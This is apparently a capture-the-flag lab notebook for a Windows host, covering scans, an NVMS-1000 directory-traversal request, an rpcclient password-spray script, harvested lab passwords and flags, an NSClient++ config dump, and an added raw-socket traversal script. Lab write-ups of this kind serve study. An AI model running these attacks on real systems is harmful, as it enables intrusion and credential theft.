OSCP-style pentest notebook (CherryTree .ctb, SQLite format 3) for host 10.10.10.184 (SERVMON, Windows).

Nodes in the notebook: Methodology; 10.10.10.X with Enumeration (TCP, UDP, Web Services: CMS, WebDav, Dirb\DirBuster, Nikto; DB, SNMP, SMB, Other Services, Script Results), Exploitation and Post Exploitation (Running Processes, File System, Host Information, Network, Users & Groups, Installed Applications, Goodies, Priv Escalation, Scheduled Jobs, Passwords, Software Versions, Proof\Flags\Other, Hashes); Log Book. Nodes not reproduced below hold only their template headings (Process List; Writeable Files\Directories, Directory List; Operating System, Architecture, Domain, Installed Updates; IPConfig\IFConfig, Network Processes, ARP, DNS, Route; Users, Groups; Installed Applications; Scheduled Tasks; Software Versions, Potential Exploits).


Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopscan
☐ joomscan
☐ LFI\RFI test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather version numbers
☐ Searchsploit
☐ Default creds
☐ Creds previously gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH keys
☐ Delete files


10.10.10.X

Enumeration (TCP)

$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 10:02 EDT
Nmap scan report for 10.10.10.184
Host is up (0.025s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  tcpwrapped
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[The raw SF-Port80-TCP and SF-Port8443-TCP fingerprint blocks repeat, byte for byte, the port 80 and port 8443 responses already shown under fingerprint-strings above and are not reproduced here.]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m22s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-16T14:08:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.99 seconds

Worth noting from the scan: anonymous FTP exposes a Users directory; port 80 is an unidentified web application that redirects to Pages/login.htm; port 8443 is the NSClient++ web interface with a self-signed certificate for localhost; SMB signing is not required.


Exploitation

Service Exploited: NVMS-1000
Vulnerability Type: Directory Traversal
Exploit POC: https://www.exploit-db.com/exploits/47774
Description / Discovery of Vulnerability: (not filled in)
Exploit Code Used:

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

Gets us the list of passwords (see the Passwords node). The request has to be sent raw: an HTTP client that normalises "/../" before sending (curl does by default) never reaches the traversal.

Password spray: use rpcclient to find which password from Passwords.txt belongs to Nadine, then log in over SSH (port 22).

#!/bin/bash
# Spray every line of passwords.txt against every user in users.txt over SMB/RPC.
# rpcclient exits non-zero on NT_STATUS_LOGON_FAILURE, so a zero exit marks a valid credential.
while IFS= read -r u; do
    echo "[*] user: $u"
    while IFS= read -r p; do
        if rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184 >/dev/null 2>&1; then
            echo "[+] valid: $u:$p"
        fi
    done < passwords.txt
done < users.txt

Proof\Local.txt file
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel


Post Exploitation

nadine@SERVMON C:\Program Files

Passwords

Passwords.txt (from Nathan's desktop via the traversal above):
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Users.txt:
administrator
Nathan
Nadine

Valid credential from the spray: Nadine:L1k3B1gBut7s@W0rk
Found ew2x6SsGTxjRwXOT in NSClient.ini (see Log Book)

Proof\Flags\Other

User - Nadine - 88a3b91d3946f557a05db54554d6ae6e
Root - ace1e4ada884ea07256545f50fd7af22

Priv Escalation (template, not filled in)

Service Exploited:
Vulnerability Type:
Exploit POC:
Description / Discovery of Vulnerability:
Exploit Code Used:
Proof\Local.txt file
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel


Log Book

NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false

; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled

; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script and %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -

; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]

; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar

; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true

Points of note in this config: the NSClient++ API password is stored in clear text in a file readable from the nadine shell; "allowed hosts = 127.0.0.1" limits API calls to the local host, so reaching the 8443 interface from the attacking machine needs a port forward (Methodology: "access internal services (portfwd)"); "CheckExternalScripts = enabled" together with "allow arguments = true" means external check scripts run with arguments supplied by the caller.
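The traversal request in the Exploitation node above has to leave the attacking host exactly as written, since curl and most HTTP libraries collapse "/../" before sending. The following is an added example (not code from the notebook) that builds that raw request and sends it over a plain TCP socket; the default depth of 12 "../" segments, the target host and the port are assumptions, and the response parser is written so it can be checked offline on a constructed response.

```shell
#!/bin/sh
# Added example, not from the notebook: replay the NVMS-1000 style directory
# traversal with a hand-built HTTP/1.1 request. It must go out raw, because curl
# and most HTTP libraries normalise "/../" before sending. The default depth of
# 12 and the host/port in the example run are assumptions, not captured values.

# Print a raw GET request for <path> prefixed by <depth> "../" segments.
# Usage: traversal_request <host-header> <relative-path> [depth]
traversal_request() {
    local host="$1" path="$2" depth="${3:-12}" prefix="" i=0
    while [ "$i" -lt "$depth" ]; do
        prefix="$prefix../"
        i=$((i + 1))
    done
    printf 'GET /%s%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' \
        "$prefix" "$path" "$host"
}

# Read a raw HTTP response on stdin and print only the body, i.e. everything
# after the first empty line. Both CRLF and bare LF header terminators work.
http_body() {
    awk -v CR="$(printf '\r')" '
        body { print; next }
        $0 == "" || $0 == CR { body = 1 }'
}

# Send the request over a TCP socket and print the response body.
# Needs bash (or another shell that provides /dev/tcp); plain sh lacks it.
# Usage: traversal_fetch <host> <port> <relative-path> [depth]
traversal_fetch() {
    local host="$1" port="$2" path="$3" depth="${4:-12}"
    exec 3<>"/dev/tcp/$host/$port" || return 1
    traversal_request "$host" "$path" "$depth" >&3
    http_body <&3
    exec 3>&-
}

# Example run against an assumed target and port:
# traversal_fetch 10.10.10.184 80 Users/Nathan/Desktop/Passwords.txt
```

Because the request is written with printf and pushed straight into the socket, the "../" chain reaches the server intact; the same function also works for any other file the traversal can reach by changing the path argument.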
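The nsclient.ini dump in the Log Book is worth checking mechanically rather than by eye, because the dangerous combination (a stored API password, an enabled CheckExternalScripts module and "allow arguments = true") is spread across three sections. The following is an added example (not code from the notebook or from NSClient++) that audits an nsclient.ini for exactly those settings; the sample file it writes is constructed to mirror the captured config, and the hardened values used in the usage note are assumptions.

```shell
#!/bin/sh
# Added example, not from the notebook: audit an NSClient++ nsclient.ini for the
# settings that matter in the Log Book dump. Findings ("[!]") are a stored API
# password, an enabled CheckExternalScripts module and "allow arguments = true";
# informational lines ("[i]") report the allowed hosts and the web API module.

# Usage: nsclient_audit <nsclient.ini>   (prints one line per finding)
nsclient_audit() {
    awk '
        function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t\r]+$/, "", s); return s }
        /^[ \t]*[;#]/ || /^[ \t\r]*$/ { next }            # comments and blank lines
        /^[ \t]*\[/ {                                     # [section] header
            s = $0; gsub(/^[ \t]*\[/, "", s); gsub(/][ \t\r]*$/, "", s)
            section = tolower(s); next
        }
        index($0, "=") > 0 {                              # key = value (first "=" splits)
            key = tolower(trim(substr($0, 1, index($0, "=") - 1)))
            val = tolower(trim(substr($0, index($0, "=") + 1)))
            if (section == "/settings/default" && key == "password" && val != "")
                print "[!] API password stored in clear text under [/settings/default]"
            if (section == "/settings/default" && key == "allowed hosts")
                print "[i] API accepts connections from: " val
            if (section == "/modules" && key == "webserver" && val == "enabled")
                print "[i] WEBServer module enabled (the HTTPS listener seen on 8443)"
            if (section == "/modules" && key == "checkexternalscripts" && val == "enabled")
                print "[!] CheckExternalScripts module enabled"
            if (section == "/settings/external scripts" && key == "allow arguments" && val == "true")
                print "[!] external scripts accept caller-supplied arguments (allow arguments = true)"
        }' "$1"
}

# Number of "[!]" findings, for use as a pass/fail baseline check.
# Usage: nsclient_finding_count <nsclient.ini>
nsclient_finding_count() {
    nsclient_audit "$1" | grep -c '^\[!\]' || true
}

# Write a constructed sample that mirrors the captured config (not the real file).
# Usage: write_sample_ini <path>
write_sample_ini() {
    cat > "$1" <<'EOF'
; constructed sample mirroring the captured nsclient.ini
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1
[/modules]
WEBServer = enabled
NRPEServer = enabled
CheckExternalScripts = enabled
[/settings/external scripts/scripts]
[/settings/external scripts]
allow arguments = true
EOF
}

# Example run: set NSCLIENT_INI to audit a real file, otherwise audit the sample.
if [ -n "${NSCLIENT_INI:-}" ]; then
    nsclient_audit "$NSCLIENT_INI"
fi
```

Running the audit on the sample reports three findings. Changing the sample to "CheckExternalScripts = disabled" and "allow arguments = false" (assumed hardened values) leaves only the clear-text password finding, which is a property of how NSClient++ stores the setting rather than something the file can fix on its own.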